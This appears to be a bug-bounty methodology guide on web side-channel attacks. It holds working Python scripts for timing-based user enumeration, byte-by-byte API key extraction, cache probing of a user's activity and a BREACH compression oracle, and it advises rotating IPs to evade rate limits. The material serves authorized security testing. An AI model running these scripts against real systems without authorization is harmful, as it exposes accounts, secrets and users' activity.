Authorization - Authorized Bug Bounty Engagement

Search and lookup:

• User search (autocomplete, people finder)
• Email lookup (invite flows, "share with" features)
• Username availability checks
• Phone number verification endpoints

Cryptographic operations:

• Signing endpoints (JWT minting, document signing)
• Encryption/decryption endpoints
• Hash comparison endpoints (file integrity checks)

Database-backed lookups:

• Indexed vs non-indexed field queries (timing reveals schema)
• Filtered vs unfiltered queries (admin search vs user search)
• Paginated results where total count is hidden but response time scales with result count

File operations:

• File existence checks (profile picture, uploaded document)
• Path traversal attempts where 403 vs 404 timing differs
• Download endpoints where valid file ID triggers disk I/O

Discovery technique: Send two requests to each endpoint - one with a known-valid input and one with a known-invalid input. Use time.perf_counter_ns() in Python or browser DevTools Network tab to compare response times. Any consistent difference above 10ms warrants deeper investigation with full statistical analysis.

Attack Class 1: Timing Oracle for User Enumeration

Root cause: Valid username triggers expensive operations that invalid username skips.

The most common pattern: a login endpoint receives username + password. If the username exists, the server fetches the user record and runs bcrypt/argon2 password verification (50-500ms). If the username does not exist, the server returns immediately after the database lookup miss (1-10ms). The error message is identical ("Invalid credentials") but the timing is not.

Alternative causes:

• Valid username triggers DB row fetch + multiple field comparisons; invalid username returns after index miss
• Valid username triggers account lockout counter increment; invalid username skips it
• Valid username loads user preferences/settings from a secondary store; invalid username does not
• Valid email in password reset triggers email sending (SMTP latency); invalid email returns immediately

Measurement methodology:

1. Identify a known-valid username (register one, or use a common admin account)
2. Choose a known-invalid username (long random string)
3. Use the SAME wrong password for both - this eliminates password processing as a variable
4. Collect N samples (minimum 100, recommended 200+) for each group
5. Measure with time.perf_counter_ns() for nanosecond precision
6. Discard outliers beyond 2 standard deviations - these are network jitter, not signal
7. Run during low-traffic periods to reduce server-side noise
8. Run from a stable network connection (wired preferred, no VPN if possible)
9. Add a small delay between requests (50-100ms) to avoid triggering rate limits that would distort timing

Complete Python timing harness:

#!/usr/bin/env python3
"""
Side-channel timing oracle - user enumeration via response time analysis.
Measures timing differences between valid and invalid inputs,
then applies statistical tests to prove the difference is real.
"""

import asyncio
import time
import statistics
import json
import sys
from dataclasses import dataclass, field

import aiohttp
from scipy import stats
import numpy as np


@dataclass
class TimingResult:
    label: str
    times_ns: list[int] = field(default_factory=list)

    @property
    def times_ms(self) -> list[float]:
        return [t / 1_000_000 for t in self.times_ns]

    @property
    def mean_ms(self) -> float:
        return statistics.mean(self.times_ms)

    @property
    def median_ms(self) -> float:
        return statistics.median(self.times_ms)

    @property
    def stdev_ms(self) -> float:
        return statistics.stdev(self.times_ms) if len(self.times_ms) > 1 else 0.0

    def remove_outliers(self, num_stdev: float = 2.0) -> "TimingResult":
        """Remove samples beyond num_stdev standard deviations."""
        if len(self.times_ns) < 10:
            return self
        mean = statistics.mean(self.times_ns)
        sd = statistics.stdev(self.times_ns)
        filtered = [t for t in self.times_ns if abs(t - mean) <= num_stdev * sd]
        result = TimingResult(label=self.label)
        result.times_ns = filtered
        return result


def cohens_d(group1: list[float], group2: list[float]) -> float:
    """Calculate Cohen's d effect size."""
    n1, n2 = len(group1), len(group2)
    var1, var2 = statistics.variance(group1), statistics.variance(group2)
    pooled_std = ((var1 * (n1 - 1) + var2 * (n2 - 1)) / (n1 + n2 - 2)) ** 0.5
    if pooled_std == 0:
        return 0.0
    return abs(statistics.mean(group1) - statistics.mean(group2)) / pooled_std


async def collect_timing(
    session: aiohttp.ClientSession,
    url: str,
    method: str,
    payload: dict,
    headers: dict,
    label: str,
    num_samples: int = 200,
    delay_ms: int = 50,
) -> TimingResult:
    """Collect timing samples for a single input variant."""
    result = TimingResult(label=label)
    for i in range(num_samples):
        start = time.perf_counter_ns()
        if method.upper() == "POST":
            async with session.post(url, json=payload, headers=headers) as resp:
                await resp.read()
        else:
            async with session.get(url, params=payload, headers=headers) as resp:
                await resp.read()
        elapsed = time.perf_counter_ns() - start
        result.times_ns.append(elapsed)
        if delay_ms > 0:
            await asyncio.sleep(delay_ms / 1000)
        if (i + 1) % 50 == 0:
            print(f"  [{label}] {i + 1}/{num_samples} samples collected")
    return result


def analyze_timing(valid: TimingResult, invalid: TimingResult) -> dict:
    """Run statistical tests comparing two timing distributions."""
    # Remove outliers
    v = valid.remove_outliers(2.0)
    inv = invalid.remove_outliers(2.0)

    v_ms = v.times_ms
    inv_ms = inv.times_ms

    # Welch's t-test (unequal variance, does not assume equal sample sizes)
    t_stat, t_pvalue = stats.ttest_ind(v_ms, inv_ms, equal_var=False)

    # Mann-Whitney U test (non-parametric, no normality assumption)
    u_stat, u_pvalue = stats.mannwhitneyu(
        v_ms, inv_ms, alternative="two-sided"
    )

    # Kolmogorov-Smirnov test (compares full distributions)
    ks_stat, ks_pvalue = stats.ks_2samp(v_ms, inv_ms)

    # Effect size
    d = cohens_d(v_ms, inv_ms)

    # Rank-biserial correlation (effect size for Mann-Whitney)
    n1, n2 = len(v_ms), len(inv_ms)
    rank_biserial = 1 - (2 * u_stat) / (n1 * n2)

    # 95% confidence interval for the mean difference
    mean_diff = v.mean_ms - inv.mean_ms
    se_diff = (v.stdev_ms**2 / len(v_ms) + inv.stdev_ms**2 / len(inv_ms)) ** 0.5
    ci_low = mean_diff - 1.96 * se_diff
    ci_high = mean_diff + 1.96 * se_diff

    results = {
        "valid_username": {
            "label": v.label,
            "n_samples": len(v_ms),
            "mean_ms": round(v.mean_ms, 3),
            "median_ms": round(v.median_ms, 3),
            "stdev_ms": round(v.stdev_ms, 3),
        },
        "invalid_username": {
            "label": inv.label,
            "n_samples": len(inv_ms),
            "mean_ms": round(inv.mean_ms, 3),
            "median_ms": round(inv.median_ms, 3),
            "stdev_ms": round(inv.stdev_ms, 3),
        },
        "mean_difference_ms": round(mean_diff, 3),
        "confidence_interval_95": {
            "low_ms": round(ci_low, 3),
            "high_ms": round(ci_high, 3),
        },
        "welch_t_test": {
            "t_statistic": round(t_stat, 4),
            "p_value": t_pvalue,
            "significant": t_pvalue < 0.01,
        },
        "mann_whitney_u": {
            "u_statistic": round(u_stat, 4),
            "p_value": u_pvalue,
            "significant": u_pvalue < 0.01,
            "rank_biserial_r": round(rank_biserial, 4),
        },
        "kolmogorov_smirnov": {
            "ks_statistic": round(ks_stat, 4),
            "p_value": ks_pvalue,
            "significant": ks_pvalue < 0.01,
        },
        "cohens_d": round(d, 4),
        "effect_size_interpretation": (
            "large" if d >= 0.8 else
            "medium" if d >= 0.5 else
            "small" if d >= 0.2 else
            "negligible"
        ),
        "verdict": (
            "PROVEN - statistically significant AND practically meaningful"
            if t_pvalue < 0.01 and d >= 0.5
            else "LIKELY - statistically significant but small effect size"
            if t_pvalue < 0.01
            else "NOT PROVEN - no statistically significant difference"
        ),
    }
    return results


def format_report_section(results: dict) -> str:
    """Format results as a markdown section for a HackerOne report."""
    v = results["valid_username"]
    inv = results["invalid_username"]
    ci = results["confidence_interval_95"]
    lines = [
        "### Statistical Evidence of Timing Difference",
        "",
        "| Metric | Valid Username | Invalid Username |",
        "|--------|--------------|-----------------|",
        f"| Samples (after outlier removal) | {v['n_samples']} | {inv['n_samples']} |",
        f"| Mean response time | {v['mean_ms']:.1f} ms | {inv['mean_ms']:.1f} ms |",
        f"| Median response time | {v['median_ms']:.1f} ms | {inv['median_ms']:.1f} ms |",
        f"| Standard deviation | {v['stdev_ms']:.1f} ms | {inv['stdev_ms']:.1f} ms |",
        "",
        f"**Mean difference:** {results['mean_difference_ms']:.1f} ms "
        f"(95% CI: [{ci['low_ms']:.1f}, {ci['high_ms']:.1f}] ms)",
        "",
        "**Statistical tests:**",
        "",
        f"- Welch's t-test: t = {results['welch_t_test']['t_statistic']:.2f}, "
        f"p = {results['welch_t_test']['p_value']:.2e}",
        f"- Mann-Whitney U: U = {results['mann_whitney_u']['u_statistic']:.0f}, "
        f"p = {results['mann_whitney_u']['p_value']:.2e}, "
        f"r = {results['mann_whitney_u']['rank_biserial_r']:.3f}",
        f"- Kolmogorov-Smirnov: D = {results['kolmogorov_smirnov']['ks_statistic']:.3f}, "
        f"p = {results['kolmogorov_smirnov']['p_value']:.2e}",
        "",
        f"**Effect size:** Cohen's d = {results['cohens_d']:.2f} "
        f"({results['effect_size_interpretation']})",
        "",
        f"**Verdict:** {results['verdict']}",
    ]
    return "\n".join(lines)


async def main():
    """Example usage - modify URL, payloads, and headers for your target."""
    url = "https://TARGET.com/api/login"
    headers = {"Content-Type": "application/json"}
    valid_payload = {"username": "known_valid_user", "password": "wrongpassword123"}
    invalid_payload = {"username": "xq9z7nonexistent_user_abc", "password": "wrongpassword123"}
    num_samples = 200

    print(f"Collecting {num_samples} timing samples per group...")
    print(f"Target: {url}\n")

    async with aiohttp.ClientSession() as session:
        valid_result = await collect_timing(
            session, url, "POST", valid_payload, headers,
            label="valid_user", num_samples=num_samples, delay_ms=50,
        )
        invalid_result = await collect_timing(
            session, url, "POST", invalid_payload, headers,
            label="invalid_user", num_samples=num_samples, delay_ms=50,
        )

    results = analyze_timing(valid_result, invalid_result)
    print("\n" + "=" * 60)
    print(json.dumps(results, indent=2))
    print("\n" + "=" * 60)
    print("\n--- HackerOne Report Section ---\n")
    print(format_report_section(results))


if __name__ == "__main__":
    asyncio.run(main())

Interpretation guide:

• p < 0.01 AND Cohen's d > 0.5 = PROVEN - statistically significant AND practically meaningful. Report it.
• p < 0.01 AND Cohen's d < 0.5 = LIKELY - real difference but small. May need more samples or a different measurement approach. Consider whether the difference is exploitable at scale.
• p > 0.01 = NOT PROVEN - cannot distinguish from noise. Do not report. Collect more samples or test a different endpoint.

Common pitfalls:

• Testing from a high-latency network that drowns out small server-side differences. Use a VPS close to the target.
• Not using the same password for both groups. Password hashing time varies with input.
• Rate limiting kicking in mid-collection, adding artificial delays to one group.
• CDN caching causing the second group to be faster regardless of input validity.
• Server warm-up effects - always discard the first 10-20 requests as warm-up.

Attack Class 2: Byte-by-Byte Secret Extraction via Timing

Root cause: Non-constant-time string comparison. Languages and frameworks that use ==, strcmp(), or memcmp() compare byte-by-byte and return false on the first mismatch. When the first byte matches, comparison proceeds to the second byte (slightly longer). When it doesn't match, comparison fails immediately (slightly shorter).

Where this applies:

• API key validation where the key is compared directly (not hashed first)
• HMAC verification using == instead of hmac.compare_digest()
• License key validation
• Internal tokens compared with string equality
• Webhook signature verification (X-Hub-Signature)

Why this is hard: The timing difference per byte is typically 1-10 nanoseconds on the server side. Network jitter (milliseconds) is orders of magnitude larger. You need hundreds or thousands of samples per candidate byte and rigorous statistical testing to extract signal from noise.

Methodology:

1. For byte position 0: try all candidate values (a-z, 0-9, special chars, or all 256 byte values)
2. For each candidate, send N requests (minimum 500) and record response times
3. The candidate that produces the longest mean response time is likely the correct byte
4. Apply a statistical test - the correct byte's timing distribution should be significantly different from all other candidates
5. Move to byte position 1 and repeat, keeping the correct byte 0 fixed
6. Continue until the full secret is extracted or the endpoint accepts the input

Python extraction script:

#!/usr/bin/env python3
"""
Byte-by-byte secret extraction via timing side channel.
For API keys, tokens, or HMAC values compared with non-constant-time functions.
"""

import asyncio
import time
import statistics
import string

import aiohttp
from scipy import stats
import numpy as np


CHARSET = string.ascii_lowercase + string.digits + string.ascii_uppercase + "-_"
SAMPLES_PER_CANDIDATE = 500
ROUNDS = 3  # Repeat the full extraction per position to build confidence
DELAY_MS = 20


async def time_request(
    session: aiohttp.ClientSession,
    url: str,
    headers: dict,
    candidate_key: str,
) -> int:
    """Send a request with the candidate key and return elapsed nanoseconds."""
    h = {**headers, "X-API-Key": candidate_key}
    start = time.perf_counter_ns()
    async with session.get(url, headers=h) as resp:
        await resp.read()
    return time.perf_counter_ns() - start


async def test_position(
    session: aiohttp.ClientSession,
    url: str,
    headers: dict,
    known_prefix: str,
    key_length: int,
    position: int,
) -> tuple[str, dict]:
    """Test all candidate characters for a single byte position."""
    padding = "a" * (key_length - position - 1)
    candidate_timings: dict[str, list[float]] = {}

    for char in CHARSET:
        candidate = known_prefix + char + padding
        times_ns = []
        for _ in range(SAMPLES_PER_CANDIDATE):
            elapsed = await time_request(session, url, headers, candidate)
            times_ns.append(elapsed)
            await asyncio.sleep(DELAY_MS / 1000)

        # Remove outliers
        mean = statistics.mean(times_ns)
        sd = statistics.stdev(times_ns) if len(times_ns) > 1 else 0
        filtered = [t for t in times_ns if abs(t - mean) <= 2 * sd] or times_ns
        candidate_timings[char] = [t / 1_000_000 for t in filtered]

        avg = statistics.mean(candidate_timings[char])
        print(f"  Position {position}: '{char}' -> {avg:.3f} ms "
              f"(n={len(candidate_timings[char])})")

    # Find the character with the highest mean response time
    means = {c: statistics.mean(t) for c, t in candidate_timings.items()}
    best_char = max(means, key=means.get)
    second_best = sorted(means.values(), reverse=True)[1]

    # Statistical test: is the best character significantly different from the rest?
    best_times = candidate_timings[best_char]
    other_times = []
    for c, t in candidate_timings.items():
        if c != best_char:
            other_times.extend(t)

    t_stat, p_value = stats.ttest_ind(best_times, other_times, equal_var=False)
    margin = means[best_char] - second_best

    result = {
        "position": position,
        "best_char": best_char,
        "best_mean_ms": round(means[best_char], 4),
        "second_best_mean_ms": round(second_best, 4),
        "margin_ms": round(margin, 4),
        "p_value": p_value,
        "confident": p_value < 0.01 and margin > 0,
    }

    return best_char, result


async def extract_secret(
    url: str,
    headers: dict,
    key_length: int = 32,
    max_bytes: int = 8,
):
    """Extract up to max_bytes of a secret via timing side channel."""
    known = ""
    results = []

    async with aiohttp.ClientSession() as session:
        for pos in range(min(key_length, max_bytes)):
            print(f"\n--- Extracting byte position {pos} ---")
            print(f"Known prefix so far: '{known}'")

            # Run multiple rounds and take majority vote
            round_winners = []
            for round_num in range(ROUNDS):
                print(f"  Round {round_num + 1}/{ROUNDS}")
                char, info = await test_position(
                    session, url, headers, known, key_length, pos
                )
                round_winners.append(char)
                print(f"  Round winner: '{char}' (p={info['p_value']:.2e})")

            # Majority vote across rounds
            from collections import Counter
            votes = Counter(round_winners)
            final_char = votes.most_common(1)[0][0]
            confidence = votes[final_char] / ROUNDS

            print(f"\n  Position {pos}: '{final_char}' "
                  f"(confidence: {confidence:.0%}, votes: {dict(votes)})")

            if confidence < 0.67:
                print(f"  WARNING: Low confidence at position {pos}. "
                      f"Results may be unreliable past this point.")

            known += final_char
            results.append({
                "position": pos,
                "extracted_char": final_char,
                "confidence": confidence,
                "votes": dict(votes),
            })

    print(f"\n{'='*60}")
    print(f"Extracted secret prefix: {known}")
    print(f"Full results: {results}")
    return known, results


if __name__ == "__main__":
    # Modify these for your target
    TARGET_URL = "https://TARGET.com/api/validate"
    TARGET_HEADERS = {"Content-Type": "application/json"}
    KEY_LENGTH = 32  # Expected key length

    asyncio.run(extract_secret(TARGET_URL, TARGET_HEADERS, KEY_LENGTH, max_bytes=8))

Practical considerations:

• Extract at least 4 bytes to demonstrate the technique works. Full extraction is not required for a valid report.
• If the key is hashed before comparison (bcrypt, SHA-256), this attack does not work. The hash output changes completely with each input byte, so there is no byte-by-byte timing signal.
• If the endpoint rate-limits after N failures, you may need to rotate source IPs or use the @rate-limit-bypass skill.
• Run from a VPS in the same cloud region as the target to minimize network noise.

Attack Class 3: Cache-Based Inference

CDN cache probing: Request a user's profile page or resource. If the CDN returns a cache HIT (fast response, X-Cache: HIT header), someone accessed that resource recently. If it returns a cache MISS (slow response, X-Cache: MISS), the resource hasn't been accessed in a while.

What this reveals:

• Whether a specific user has logged in recently (their profile/avatar was cached)
• Whether a specific page was viewed recently (product page, article)
• Whether a specific file was downloaded recently
• User activity patterns (when they are online, what they browse)

Measurement approach:

1. Request the target resource and note the response time and cache headers
2. Wait for the cache TTL to expire (or test a resource you know hasn't been accessed)
3. Have the target user access the resource (or wait for natural access)
4. Request the resource again - if cache HIT, the user accessed it

#!/usr/bin/env python3
"""Cache-based user activity inference."""

import time
import requests


def probe_cache(url: str, headers: dict | None = None) -> dict:
    """Probe a URL for cache status and timing."""
    start = time.perf_counter_ns()
    resp = requests.get(url, headers=headers or {})
    elapsed_ms = (time.perf_counter_ns() - start) / 1_000_000

    cache_status = resp.headers.get("X-Cache", "UNKNOWN")
    cf_cache = resp.headers.get("CF-Cache-Status", "UNKNOWN")
    age = resp.headers.get("Age", "N/A")
    cache_control = resp.headers.get("Cache-Control", "N/A")

    return {
        "url": url,
        "status_code": resp.status_code,
        "response_time_ms": round(elapsed_ms, 2),
        "x_cache": cache_status,
        "cf_cache_status": cf_cache,
        "age": age,
        "cache_control": cache_control,
        "likely_cached": (
            "HIT" in cache_status.upper()
            or "HIT" in cf_cache.upper()
            or (age != "N/A" and int(age) > 0)
        ),
    }


def detect_user_activity(profile_url: str, num_probes: int = 5) -> None:
    """Probe a user's profile URL repeatedly to detect caching patterns."""
    print(f"Probing: {profile_url}")
    print(f"Collecting {num_probes} probes with 2s delay...\n")

    for i in range(num_probes):
        result = probe_cache(profile_url)
        cached = "CACHED" if result["likely_cached"] else "NOT CACHED"
        print(f"  Probe {i+1}: {result['response_time_ms']:.1f}ms | "
              f"X-Cache: {result['x_cache']} | "
              f"CF: {result['cf_cache_status']} | "
              f"Age: {result['age']} | {cached}")
        time.sleep(2)


if __name__ == "__main__":
    # Target: a user's profile picture, avatar, or public profile page
    detect_user_activity("https://TARGET.com/users/victim/avatar.jpg")

Application-level cache timing:

• Cached database query returns in 1-5ms; uncached query takes 50-200ms
• First request for /api/users/12345 is slow (DB query); second request is fast (cached)
• This reveals whether user ID 12345 has been active recently (their data is in cache)
• No special headers needed - pure timing analysis with the statistical harness from Attack Class 1

DNS cache probing:

• Send a DNS query for userprofile.target.com
• If the TTL in the response is less than the configured max TTL, someone resolved it recently
• Tools: dig +norecurse @resolver userprofile.target.com

Privacy impact: Cache probing can reveal browsing habits, activity patterns, and user presence without any authentication. This is typically Medium severity (CVSS 5.3-6.5) depending on the sensitivity of the inferred information.

Attack Class 4: Error-Based Side Channels

These are simpler than timing attacks but equally effective for user enumeration. The key is finding any observable difference in the response between valid and invalid inputs.

HTTP status code differences:

• 403 Forbidden for existing user (account locked) vs 404 Not Found for non-existing user
• 200 OK with error message for valid email vs 400 Bad Request for invalid format
• 302 Redirect to different locations based on user existence

Response body size differences:

• Valid user: {"error": "Invalid password. You have 4 attempts remaining."} (62 bytes)
• Invalid user: {"error": "Invalid credentials."} (31 bytes)
• Even with identical error messages, the response body may differ in whitespace, headers, or metadata

Response header differences:

• Set-Cookie header present only when user exists (session created on lookup)
• X-RateLimit-Remaining header present only for valid users
• Different Content-Type headers
• Retry-After header only for existing accounts (lockout)

Redirect target differences:

• Valid user with wrong password redirects to /login?error=password
• Invalid user redirects to /login?error=credentials
• Valid user redirects to /login?ref=account; invalid user to /login

Measurement script:

#!/usr/bin/env python3
"""Error-based side channel detection - compare responses for valid vs invalid inputs."""

import requests
import json


def compare_responses(
    url: str,
    valid_payload: dict,
    invalid_payload: dict,
    method: str = "POST",
    headers: dict | None = None,
) -> dict:
    """Compare HTTP responses for two different inputs."""
    h = headers or {"Content-Type": "application/json"}

    if method.upper() == "POST":
        r_valid = requests.post(url, json=valid_payload, headers=h, allow_redirects=False)
        r_invalid = requests.post(url, json=invalid_payload, headers=h, allow_redirects=False)
    else:
        r_valid = requests.get(url, params=valid_payload, headers=h, allow_redirects=False)
        r_invalid = requests.get(url, params=invalid_payload, headers=h, allow_redirects=False)

    differences = []

    if r_valid.status_code != r_invalid.status_code:
        differences.append({
            "type": "status_code",
            "valid": r_valid.status_code,
            "invalid": r_invalid.status_code,
        })

    if len(r_valid.content) != len(r_invalid.content):
        differences.append({
            "type": "response_size",
            "valid_bytes": len(r_valid.content),
            "invalid_bytes": len(r_invalid.content),
        })

    if r_valid.text != r_invalid.text:
        differences.append({
            "type": "response_body",
            "valid_body": r_valid.text[:500],
            "invalid_body": r_invalid.text[:500],
        })

    # Compare headers
    valid_headers = set(r_valid.headers.keys())
    invalid_headers = set(r_invalid.headers.keys())
    header_diff = valid_headers.symmetric_difference(invalid_headers)
    if header_diff:
        differences.append({
            "type": "response_headers",
            "only_in_valid": list(valid_headers - invalid_headers),
            "only_in_invalid": list(invalid_headers - valid_headers),
        })

    # Compare specific header values
    for hdr in valid_headers.intersection(invalid_headers):
        if r_valid.headers[hdr] != r_invalid.headers[hdr]:
            differences.append({
                "type": "header_value",
                "header": hdr,
                "valid_value": r_valid.headers[hdr],
                "invalid_value": r_invalid.headers[hdr],
            })

    # Check redirect targets
    if r_valid.is_redirect or r_invalid.is_redirect:
        differences.append({
            "type": "redirect",
            "valid_location": r_valid.headers.get("Location", "none"),
            "invalid_location": r_invalid.headers.get("Location", "none"),
        })

    return {
        "url": url,
        "differences_found": len(differences),
        "differences": differences,
        "enumerable": len(differences) > 0,
    }


if __name__ == "__main__":
    result = compare_responses(
        url="https://TARGET.com/api/login",
        valid_payload={"email": "[email protected]", "password": "wrong"},
        invalid_payload={"email": "[email protected]", "password": "wrong"},
    )
    print(json.dumps(result, indent=2))

Proof requirement: Demonstrate that you can distinguish between valid and invalid users with at least 95% accuracy over 20+ test cases using the observable difference.

Attack Class 5: Resource Consumption Side Channels

Response size correlation:

• Encrypted or compressed responses still leak the size of the plaintext
• A search for "admin" returning 3 results produces a smaller encrypted response than a search returning 300 results
• Even with padding, most implementations don't pad to a fixed block size

BREACH attack (compression oracle):

• Prerequisite: HTTP compression enabled (Content-Encoding: gzip/deflate) AND attacker can inject content into the response body (reflected input) AND a secret exists in the same response (CSRF token, API key)
• Technique: inject candidate text that partially matches the secret. If the candidate matches, the compressed response is smaller (compression finds a longer match). If it doesn't match, the response is larger.
• Measurement: compare Content-Length or actual response size for different candidate injections

#!/usr/bin/env python3
"""BREACH-style compression oracle - extract secrets from compressed responses."""

import requests
import string


def breach_probe(
    url: str,
    inject_param: str,
    prefix: str,
    known: str,
    candidates: str = string.ascii_lowercase + string.digits,
) -> list[tuple[str, int]]:
    """
    Test each candidate character appended to known secret prefix.
    Returns list of (candidate, response_size) sorted by size ascending.
    The smallest response likely contains the correct next character.
    """
    results = []
    for char in candidates:
        # Inject the known prefix + candidate into the reflected parameter
        injection = prefix + known + char
        params = {inject_param: injection}
        resp = requests.get(url, params=params)
        size = len(resp.content)
        results.append((char, size))
        print(f"  '{known + char}' -> {size} bytes")

    results.sort(key=lambda x: x[1])
    return results


if __name__ == "__main__":
    # The secret appears in the response (e.g., CSRF token, API key)
    # and you can inject text via a reflected parameter
    url = "https://TARGET.com/page"
    inject_param = "search"
    secret_prefix = "csrf_token="  # Known prefix before the secret value

    known = ""
    for position in range(16):
        print(f"\nExtracting position {position}, known so far: '{known}'")
        ranked = breach_probe(url, inject_param, secret_prefix, known)
        best = ranked[0]
        second = ranked[1]
        margin = second[1] - best[1]
        print(f"  Best: '{best[0]}' ({best[1]} bytes), "
              f"margin: {margin} bytes")
        if margin < 2:
            print("  WARNING: Margin too small, result may be unreliable")
        known += best[0]

    print(f"\nExtracted: {known}")

Packet count analysis:

• Different operations produce different numbers of TCP packets
• An authenticated user's dashboard load generates 15 packets; a rejected login generates 3
• Observable via network traffic analysis even when content is encrypted

Connection behavior:

• HTTP Connection: keep-alive only for authenticated users
• Different TCP window sizes based on response content
• TLS session resumption behavior differs for valid vs invalid sessions

Statistical Rigor Requirements

These requirements apply across all attack classes. Timing-based side-channel reports are rejected more often than any other finding category because triagers cannot distinguish real signal from noise in a screenshot. You must provide statistical proof.

Minimum sample sizes:

• Timing attacks: 100 samples per group minimum, 200+ recommended
• Byte extraction: 500 samples per candidate minimum
• Error-based attacks: 30 samples per group (less noise, simpler signal)
• Cache probing: 20 probes minimum (binary signal, low noise)

Which test to use:

Significance threshold: Use p < 0.01 (not the standard 0.05). Triagers are skeptical of timing claims, so a stricter threshold reduces the chance of reporting noise as a finding. A p-value of 0.03 might be "statistically significant" in academia but will not convince a triager who sees timing reports daily.

Effect size (mandatory):

• Cohen's d > 0.8 = large effect. Clear, exploitable difference. Strong report.
• Cohen's d 0.5-0.8 = medium effect. Real difference, exploitable with enough requests. Solid report.
• Cohen's d 0.2-0.5 = small effect. Detectable but may require thousands of requests to exploit reliably. Include a feasibility analysis.
• Cohen's d < 0.2 = negligible. Even if p < 0.01, the practical difference is too small to exploit. Do not report unless you can demonstrate exploitation at scale.

Noise control checklist:

• Test from a consistent network path (same machine, same connection)
• Run at consistent times (avoid testing during peak hours)
• Use a wired connection or stable VPS (not flaky WiFi)
• Warm up the connection before collecting data (discard first 10-20 requests)
• Apply identical request parameters except the variable being tested
• Add a consistent delay between requests to avoid self-induced congestion
• Run the test at least twice on different days to confirm reproducibility

Report Writing for Side-Channel Findings

Triagers reject vague timing claims. "I noticed the response was slower for valid users" is not evidence - it is an anecdote. Every side-channel report must include ALL of the following:

1. Methodology section:

## Methodology

- Tool: Custom Python timing harness using aiohttp + scipy.stats
- Samples: 200 per group (valid username, invalid username)
- Measurement: time.perf_counter_ns() around full HTTP round-trip
- Outlier removal: Samples beyond 2 standard deviations discarded
- Noise control: Tested from [VPS location], wired connection, [time of day]
- Delay: 50ms between requests to avoid rate limiting interference

2. Summary statistics table (use the format_report_section() output from the timing harness)

3. Statistical test results:

• Name of each test used and why
• Test statistic value
• p-value (in scientific notation for very small values)
• Whether the result meets the significance threshold

4. Effect size:

• Cohen's d value and its interpretation (small/medium/large)
• Rank-biserial correlation for Mann-Whitney U results

5. Practical impact:

• How many users can be enumerated per minute given the timing difference
• Whether the enumeration can be automated (it always can - include the script)
• What an attacker gains from the enumeration (credential stuffing target list, targeted phishing)

6. Reproduction steps:

## Steps to Reproduce

1. Install dependencies: `pip install aiohttp scipy numpy`
2. Save the attached `timing_oracle.py` script
3. Modify the TARGET_URL and payloads for your test
4. Run: `python timing_oracle.py`
5. Observe the statistical output showing p < 0.01 and Cohen's d > 0.5

Template - HackerOne statistical evidence section:

Use the format_report_section() function output directly. It produces a clean markdown table with all required metrics. Paste it into the report's "Supporting Material/References" or "Impact" section.

Severity guidance:

• User enumeration via timing with no other context: Low (CVSS 5.3)
• User enumeration combined with a credential stuffing attack path: Medium (CVSS 5.3-6.5)
• Secret extraction (API keys, tokens) via timing: High (CVSS 7.5-8.1)
• Cache-based user activity inference: Medium (CVSS 5.3-6.5) depending on sensitivity
• BREACH-style secret extraction from compressed responses: High (CVSS 7.4)